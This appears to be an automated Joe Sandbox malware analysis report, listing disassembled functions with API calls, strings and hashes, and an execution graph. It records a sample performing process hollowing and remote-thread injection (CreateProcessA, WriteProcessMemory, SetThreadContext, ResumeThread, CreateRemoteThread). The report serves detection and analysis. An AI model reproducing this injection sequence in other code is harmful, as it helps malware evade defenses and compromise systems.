                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: parse error$ror
                                                                                                                                              • API String ID: 2659868963-4201802366
                                                                                                                                              • Opcode ID: 0711da468fc561708c77a0ec016a98c40ff4fcdab467c598b6cb81523dc48dfd
                                                                                                                                              • Instruction ID: d878314eac875bbe0ab96bbad5d7dffdef7ccc1aac52edcb417df0a16ebbac1d
                                                                                                                                              • Opcode Fuzzy Hash: 0711da468fc561708c77a0ec016a98c40ff4fcdab467c598b6cb81523dc48dfd
                                                                                                                                              • Instruction Fuzzy Hash: 5CB1F071D102489FDB28DF64CC88BADBB71FF49304F148399E4186B792DB74AA84DB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C81ED0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C82F8E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C82FA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: value
                                                                                                                                              • API String ID: 4194217158-494360628
                                                                                                                                              • Opcode ID: 0c07b7d48f3d65637ed6902f9830c0a27ad9e9415c02de78bc488b6e4d6a325b
                                                                                                                                              • Instruction ID: 809ee18805c7eb69d8822ef6be336138f5ea50621e10bb4b1a7b814156331220
                                                                                                                                              • Opcode Fuzzy Hash: 0c07b7d48f3d65637ed6902f9830c0a27ad9e9415c02de78bc488b6e4d6a325b
                                                                                                                                              • Instruction Fuzzy Hash: 00912370C0024C9BDB15EBA0CD98BEEFBB8BF14304F0081AAE449A7252D7345B89DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C66410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 195COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66641
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C66650
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: [json.exception.
                                                                                                                                              • API String ID: 4194217158-791563284
                                                                                                                                              • Opcode ID: 57554c9299ddef8cb6d8eebbcf4098b332a067e7986b3db75ea0a9f408211d0a
                                                                                                                                              • Instruction ID: 1defa3be3a6f88d8638abf5e39e7bb01b7c2b042531e92cd71465f3c9fd9afe4
                                                                                                                                              • Opcode Fuzzy Hash: 57554c9299ddef8cb6d8eebbcf4098b332a067e7986b3db75ea0a9f408211d0a
                                                                                                                                              • Instruction Fuzzy Hash: 94615570D002489FDB28DF68DD95BAEBBB4EF45304F24831DF4156B392D7B0AA8497A0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C64590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C6470F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                              • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                              • API String ID: 2659868963-1240500531
                                                                                                                                              • Opcode ID: f565496d936fcbc3977e571d09c24ad1cdf309d8316414680a7484686e09d268
                                                                                                                                              • Instruction ID: abc482c6e1281a36159391894200c9105913ca24c752c182fbf29951c82f8e6b
                                                                                                                                              • Opcode Fuzzy Hash: f565496d936fcbc3977e571d09c24ad1cdf309d8316414680a7484686e09d268
                                                                                                                                              • Instruction Fuzzy Hash: 3541F9B1900605AFC718DF58CC81BAEF7B8EF55710F14821EF91597741E770AA41DBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C64120 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C64141
                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C64190
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                              • String ID: bad locale name
                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                              • Opcode ID: 8de93726e1db0ab7a75258fb5b63cf552d8fd0382aa7aef6a866201297643e46
                                                                                                                                              • Instruction ID: cef880e6a4d0f7a2c0bad05a337524f184ff0b5021233011f60968672a6aafd4
                                                                                                                                              • Opcode Fuzzy Hash: 8de93726e1db0ab7a75258fb5b63cf552d8fd0382aa7aef6a866201297643e46
                                                                                                                                              • Instruction Fuzzy Hash: CB118B70404B80AED320DF68C801757BBE4AF19714F008A5EE49A87B81D7B9A608CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C9DEC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C9DF0A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 190572456-1276376045
                                                                                                                                              • Opcode ID: 813192b8b1d16427ad6346712e8080e10a8256623eb739baff9a330d0a01d732
                                                                                                                                              • Instruction ID: e20f462427a46ab696d1feae326f0259e5a38529073596f2647ace192648f3c7
                                                                                                                                              • Opcode Fuzzy Hash: 813192b8b1d16427ad6346712e8080e10a8256623eb739baff9a330d0a01d732
                                                                                                                                              • Instruction Fuzzy Hash: 4A018472554756AFCB118F80DC09FBEB7B9FB04B50F000529E812E2290DB749A04CA60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:41.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:15%
                                                                                                                                              Total number of Nodes:40
                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                              execution_graph 357 1160e77 358 1160e1c 357->358 359 1160f9b VirtualProtect 358->359 361 1160f2a 358->361 360 1160fd8 359->360 312 2ce2549 313 2ce2581 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 312->313 315 2ce275e WriteProcessMemory 313->315 316 2ce27a3 315->316 317 2ce27a8 WriteProcessMemory 316->317 318 2ce27e5 WriteProcessMemory Wow64SetThreadContext ResumeThread 316->318 317->316 353 1161011 354 1161018 CreateRemoteThread 353->354 356 11610c3 354->356 319 1160518 320 116051d 319->320 324 1160970 320->324 331 1160960 320->331 321 116085a 339 1160a31 324->339 325 11609a0 329 1160a11 325->329 345 11604f4 325->345 329->321 332 1160970 331->332 338 1160a31 VirtualProtect 332->338 333 11609a0 334 11604f4 VirtualProtect 333->334 337 1160a11 333->337 335 11609e3 334->335 336 1160500 CreateRemoteThread 335->336 335->337 336->337 337->321 338->333 341 1160a36 339->341 340 1160c65 340->325 341->340 342 1160f9b VirtualProtect 341->342 344 1160f2a 341->344 343 1160fd8 342->343 343->325 344->325 346 1160f50 VirtualProtect 345->346 348 11609e3 346->348 348->329 349 1160500 348->349 350 1161018 CreateRemoteThread 349->350 352 11610c3 350->352 352->329

                                                                                                                                              Callgraph

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02CE2549 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02CE26B8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CE26CB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02CE26E9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CE270D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02CE2738
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02CE2790
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02CE27DB
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CE2819
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02CE2855
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02CE2864
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849394239.0000000002CE2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE2000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_2ce2000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: cdcfbc631243b7b6c42388bc76dd9a32f96d7b279e4d518af497f94d1e7d9e19
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: 1DB1D67664024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CEB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 01160A31 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 483memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 23 1160a31-1160a34 24 1160a36-1160a3c 23->24 25 1160a4d-1160a64 23->25 26 1160a3e-1160a4b 24->26 27 1160a8c-1160a99 24->27 28 1160c65-1160c6c 25->28 29 1160a6a-1160a6f 25->29 26->25 31 1160aab-1160ab0 27->31 32 1160a9b-1160aa9 27->32 30 1160a71-1160a84 29->30 29->31 30->31 33 1160a86-1160a8a 30->33 34 1160ab7-1160abc 31->34 32->34 33->27 36 1160ac2-1160ad5 34->36 37 1160c6d-1160cd2 34->37 36->37 38 1160adb-1160aec 36->38 45 1160cd5-1160d0c 37->45 38->37 39 1160af2-1160b32 38->39 39->37 49 1160b38-1160b55 39->49 55 1160f34-1160fd6 VirtualProtect 45->55 56 1160d12-1160d2f 45->56 54 1160b5c-1160b77 49->54 54->37 63 1160b7d-1160bbc 54->63 66 1160fdf-1161000 55->66 67 1160fd8-1160fde 55->67 56->55 61 1160d35-1160d53 56->61 61->45 69 1160d55-1160d5d 61->69 63->37 87 1160bc2-1160bd2 63->87 67->66 70 1160d60-1160d67 69->70 73 1160daf-1160db8 70->73 74 1160d69-1160d70 70->74 73->55 75 1160dbe-1160dce 73->75 74->73 76 1160d72-1160d7e 74->76 75->55 77 1160dd4-1160de2 75->77 76->55 79 1160d84-1160d8e 76->79 77->55 80 1160de8-1160df5 77->80 79->55 81 1160d94-1160da3 79->81 80->55 84 1160dfb-1160e0b 80->84 82 1160da5-1160dab 81->82 83 1160dac 81->83 82->83 83->73 84->70 86 1160e11-1160e19 84->86 88 1160e1c-1160e28 86->88 87->37 89 1160bd8-1160be8 87->89 90 1160e2e-1160e37 88->90 91 1160f1d-1160f24 88->91 89->37 92 1160bee-1160bff 89->92 94 1160e40-1160e4f 90->94 95 1160e39-1160e3f 90->95 91->88 93 1160f2a-1160f31 91->93 92->37 96 1160c01-1160c12 92->96 94->55 97 1160e55-1160e61 94->97 95->94 96->37 98 1160c14-1160c27 96->98 100 1160e63-1160e69 97->100 101 1160e6a-1160e85 97->101 98->37 99 1160c29-1160c3a 98->99 99->37 102 1160c3c-1160c4d 99->102 100->101 101->55 104 1160e8b-1160e99 101->104 102->37 105 1160c4f-1160c5f 102->105 104->55 106 1160e9f-1160eac 104->106 105->28 105->29 106->55 107 1160eb2-1160ec2 106->107 107->55 108 1160ec4-1160edc 107->108 109 1160ee6-1160ef1 108->109 110 1160ede-1160ee5 108->110 109->55 111 1160ef3-1160f00 109->111 110->109 111->55 112 1160f02-1160f17 111->112 112->90 112->91
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03CE3584,?,?,?), ref: 01160FC9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.1849169173.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_1160000_oRkIPIEeryat7GMgjkBr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 544645111-4108050209
